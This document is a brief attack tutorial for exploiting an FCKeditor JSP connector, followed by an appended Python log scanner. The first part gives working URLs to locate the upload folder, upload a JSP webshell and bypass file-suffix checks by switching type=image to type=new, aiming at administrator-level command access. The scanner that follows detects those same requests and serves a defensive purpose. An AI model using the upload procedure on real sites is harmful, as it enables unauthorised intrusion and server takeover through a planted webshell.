http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=fileupload&type=image&currentfolder=%2f
Use this address to find the path where uploaded images are stored. If the vulnerability is present, the request should return an XML file, as in the figure.
Note that the red box marks the address where uploaded images are stored.
Then use
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=image&connector=connectors/jsp/connector
Upload the JSP file through this address. If the site restricts the suffix of uploaded files, create a folder with a new name: change type=image in the URL above to type=new, and the file is uploaded to that folder, which is generally not subject to the file suffix restriction. As shown in the figure:
If all goes well, the JSP webshell obtained through this FCKeditor vulnerability should have cmd Administrator privileges.
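
On the defensive side, the connector requests described above stand out in web server access logs, in particular a fileupload call whose type is not one the site expects. The following Python is an added example, not part of the original page: the combined-log request format, the expected type list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Connector path as it appears in the URLs on this page (lowercased).
CONNECTOR = "/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector"
# Assumption: this site only expects image uploads through the editor.
EXPECTED_TYPES = {"image"}
# Assumed combined-log request field: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return a finding label for one log line, or None if it is unrelated."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path.lower() != CONNECTOR:
        return None
    # Compare parameter names and values case-insensitively.
    query = parse_qs(url.query, keep_blank_values=True)
    params = {k.lower(): v[0].lower() for k, v in query.items()}
    if params.get("command", "") != "fileupload":
        return "connector-probe"
    rtype = params.get("type", "")
    if rtype not in EXPECTED_TYPES:
        return "upload-unexpected-type:" + rtype
    return "upload"

def scan(lines):
    """Return (line_number, finding) pairs for every connector request."""
    findings = []
    for number, line in enumerate(lines, 1):
        finding = classify(line)
        if finding:
            findings.append((number, finding))
    return findings

# Constructed sample log lines (documentation address range, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.jsp HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET ' + CONNECTOR
    + '?command=fileupload&type=image&currentfolder=%2f HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST ' + CONNECTOR
    + '?Command=FileUpload&Type=new&CurrentFolder=%2f HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE):
        print(number, finding)
```

Any hit on a server that does not intentionally expose the editor's file manager is worth reviewing, and the unexpected-type finding corresponds to the type=new folder described above.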